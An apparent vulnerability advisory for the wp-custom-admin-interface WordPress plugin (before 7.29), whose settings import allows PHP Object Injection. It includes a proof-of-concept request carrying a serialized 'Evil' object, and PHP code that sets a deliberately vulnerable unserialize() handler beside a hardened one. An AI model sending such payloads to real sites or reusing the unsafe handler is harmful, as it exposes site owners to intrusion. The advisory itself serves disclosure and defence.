The plugin unserializes user input provided via the settings, which could allow high-privilege users such as admins to perform PHP Object Injection when a suitable gadget is present.
action=import_settings&settings=O%3a4%3a%22Evil%22%3a0%3a%7b%7d%3b&security=6960d7bb50
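
The unsafe pattern described above next to a hardened import routine, as an added example that is not the plugin's own code. The function names, the `Evil` stand-in class and the sample settings array are assumptions; the payload is the `settings` value from the request above.

```php
<?php
// Constructed stand-in for a gadget class. On a real site the gadget would be
// any class with magic methods loaded by another plugin, theme or library.
class Evil {
    public static $fired = false;
    public function __destruct() { self::$fired = true; }
}

// Vulnerable pattern (hypothetical handler): unserialize() instantiates
// whatever class the input names, so its magic methods run.
function import_settings_vulnerable(string $raw) {
    // PHP 8.3+ warns about the trailing ';' but still returns the object.
    return unserialize($raw);
}

// Hardened pattern: refuse object instantiation and accept only a flat
// array of scalar settings.
function import_settings_hardened(string $raw): ?array {
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data)) {
        return null; // objects, scalars and malformed input are rejected
    }
    foreach ($data as $value) {
        if (!is_scalar($value) && $value !== null) {
            return null; // nested arrays or incomplete objects are rejected
        }
    }
    return $data;
}

// The "settings" parameter from the request above, URL-decoded.
$payload = urldecode('O%3a4%3a%22Evil%22%3a0%3a%7b%7d%3b');

$obj = import_settings_vulnerable($payload);
unset($obj);                 // last reference dropped, the destructor runs
var_dump(Evil::$fired);      // shows whether the named class was instantiated

Evil::$fired = false;
var_dump(import_settings_hardened($payload)); // the object payload is refused
var_dump(Evil::$fired);      // no magic method ran on the hardened path

// A legitimate export (constructed sample) still imports.
$export = serialize(['menu_color' => '#fff', 'hide_bar' => true]);
var_dump(import_settings_hardened($export));
```

Exporting and importing settings as JSON (`json_encode` / `json_decode`) avoids `unserialize()` on request data altogether.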
CPE

Name | Operator | Version |
---|---|---|
wp-custom-admin-interface | lt | 7.29 |